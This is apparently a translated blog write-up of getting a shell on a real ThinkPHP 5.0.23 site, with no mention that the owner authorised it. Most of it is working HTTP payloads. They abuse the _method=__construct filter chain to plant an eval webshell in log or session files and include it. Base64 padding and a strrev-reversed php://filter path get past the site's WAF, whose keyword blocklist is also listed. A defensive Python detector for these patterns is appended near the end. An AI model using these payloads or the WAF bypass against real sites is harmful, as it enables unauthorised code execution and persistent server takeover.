A record of an interesting tp5 code execution

0x00 Foreword

A friend gave me this site a while back; it took a long time but finally worked, so I am simply recording it here.

0x01 Basic information

  • Vulnerability point: tp5 method code execution; the payload is as follows

    POST /?s=captcha
    
    _method=__construct&method=get&filter[]=assert&server[]=1&get[]=1
  • No echo; judging from which payloads succeeded on the target, the ThinkPHP version should be 5.0.23

  • There is a WAF; it blocks the following

    PHP tags:
    <?php
    <?=
    <?
    
    PHP functions:
    base64_decode
    file_get_contents
    convert_uuencode
    
    Keywords:
    php://
  • Linux

  • The following functions are disabled via disable_functions

    passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server
  • PHP 7.1.7 (although assert is not in disable_functions, it can no longer be invoked as a call_user_func callback)

0x02 Breakthrough

The known ideas for exploiting tp5 method code execution come down to the following two:

1. Write to the log, then include the log to get a shell. Payload as follows:

Write the shell into the log
_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST['x'])?>

Include the log to get a shell
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../data/runtime/log/201901/21.log&x=phpinfo();

2. Write to the session, then include the session to get a shell. Payload as follows:

Write the shell into the session
POST /?s=captcha HTTP/1.1
Cookie: PHPSESSID=kking


_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['x'])?>&server[]=1

Include the session to get a shell
POST /?s=captcha

_method=__construct&method=get&filter[]=think\__include_file&get[]=tmp\sess_kking&server[]=1

Neither of these two methods works here, because the WAF intercepts keywords such as <?php. Are there other ways?

Base64 encoding and the php://filter pseudo-protocol

What if the keyword could be transformed, for example by base64 encoding it?

Suppose our session file /tmp/sess_kking contained the following:

PD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Oz8+ 
<?php @eval($_GET['r']);;?>

Because the final step is performed through include, it is natural to think of decoding it via php://filter/read=convert.base64-decode/resource=/tmp/sess_kking.

The final inclusion would look similar to the following:

include('php://filter/read=convert.base64-decode/resource=/tmp/sess_kking');

But the session file will contain other characters as well.

How do we make php://filter decode it correctly?

So here, too, as long as we construct suitable padding characters, the webshell can be base64-decoded correctly.

Local test

Step one: set the session

POST /?s=captcha

_method=__construct&filter[]=think\Session::set&method=get&get[]=adPD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Oz8%2bab&server[]=1

(Note: the + here must be URL-encoded as %2b; otherwise it becomes a space when the session value is urldecoded on write, and decoding fails.)

Question 1: Why use PD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Oz8+ (<?php @eval($_GET['r']);;?>) rather than PD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Pz4= (<?php @eval($_GET['r']);?>)?

A: Because no matter what characters are placed around the single-semicolon version, it cannot be decoded correctly.

Question 2: Why is there an ab on either side of the payload?

A: So that the strings before and after the shell payload bring it to a length that base64 can decode, letting it decode correctly.

Step two: include the session file; the code executes successfully:

It works in the local test, but it could not be made to execute on the target, because our payload uses the php://filter protocol, which contains the php:// keyword.

How do we avoid the blocked keyword?

Details of tp5 method code execution

Let us look carefully at how the filterValue method in Request.php executes the code.

We note that filter can actually take multiple values, and the value is passed (by reference) through each of them in turn.

So we can pass several filters to process the value in several passes: the first, base64_decode, decodes the value, and the decoded value is then passed to include.

But this online WAF also filters the base64_decode function; testing showed that the strrev reversal function gets past it. To cope with the WAF, we wrap the shell payload in another layer of base64 encoding.

Likewise, why the payload needs a few extra semicolons needs no further explanation here.

Back to our getshell steps, executed on the target:

1. Set the session:

POST /?s=captcha
Cookie: PHPSESSID=kktest

_method=__construct&filter[]=think\Session::set&method=get&get[]=abPD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX0dFVFsnciddKSk7Oz8%2bab&server[]=1

(The ab before and after the payload are again padding characters for base64 decoding.)

2. Include the file:

POST /?s=captcha&r=cGhwaW5mbygpOw==

_method=__construct&filter[]=strrev&filter[]=think\__include_file&method=get&server[]=1&get[]=tsetkk_sses/pmt/=ecruoser/edoced-46esab.trevnoc=daer/retlif//:php

In the end the firewall was bypassed and we got a shell.
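As an added example from the defender's side (not code from the original post): a small Python detector for the request-body indicators this write-up relies on, covering both the plain session/log payloads from 0x01 and 0x02 and the strrev-reversed php://filter variant of the final step. The sample bodies are constructed to mirror the write-up, and the indicator names are my own.

```python
import base64
from urllib.parse import parse_qs

# Indicators taken from the write-up: the _method override, the callables
# chained through filter[], and the stream keywords the WAF blocked (checked
# both as-is and reversed, because strrev in the chain undoes the reversal).
SUSPICIOUS_FILTERS = {"assert", "call_user_func", "strrev", "base64_decode",
                      "think\\__include_file", "think\\session::set"}
STREAM_KEYWORDS = ("php://", "convert.base64-decode")
PHP_TAG_B64 = base64.b64encode(b"<?php").decode()[:6]   # "PD9waH"

def analyze_body(body: str) -> list:
    """Return the indicator names found in one URL-encoded POST body."""
    params = parse_qs(body, keep_blank_values=True)
    hits = []
    if "__construct" in params.get("_method", []):
        hits.append("method_override")
    for f in params.get("filter[]", []):
        if f.lower() in SUSPICIOUS_FILTERS:
            hits.append("filter:" + f.lower())
    for key, values in params.items():
        if key == "filter[]":
            continue
        for v in values:
            if PHP_TAG_B64 in v:          # base64 of "<?php" survives concatenation
                hits.append("b64_php_tag")
            for label, cand in (("", v), ("reversed:", v[::-1])):
                for kw in STREAM_KEYWORDS:
                    if kw in cand.lower():
                        hits.append(f"{label}keyword:{kw}")
    return hits

def is_tp5_rce_attempt(body: str) -> bool:
    """Flag a body that combines the override with any other indicator."""
    hits = analyze_body(body)
    return "method_override" in hits and len(hits) > 1

# Constructed sample bodies: two mirror the write-up, one is benign traffic.
SAMPLE_BODIES = [
    "_method=__construct&filter[]=think\\Session::set&method=get"
    "&get[]=abPD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX0dFVFsnciddKSk7Oz8%2bab&server[]=1",
    "_method=__construct&filter[]=strrev&filter[]=think\\__include_file&method=get"
    "&server[]=1&get[]=tsetkk_sses/pmt/=ecruoser/edoced-46esab.trevnoc=daer/retlif//:php",
    "username=alice&remember=1",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(is_tp5_rce_attempt(body), analyze_body(body))
```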

0x03 Summary

Overall very interesting; it took several nights, and finally getting a shell felt great. (Luckily I did not give up :)


Source: www.cnblogs.com/r00tuser/p/11410157.html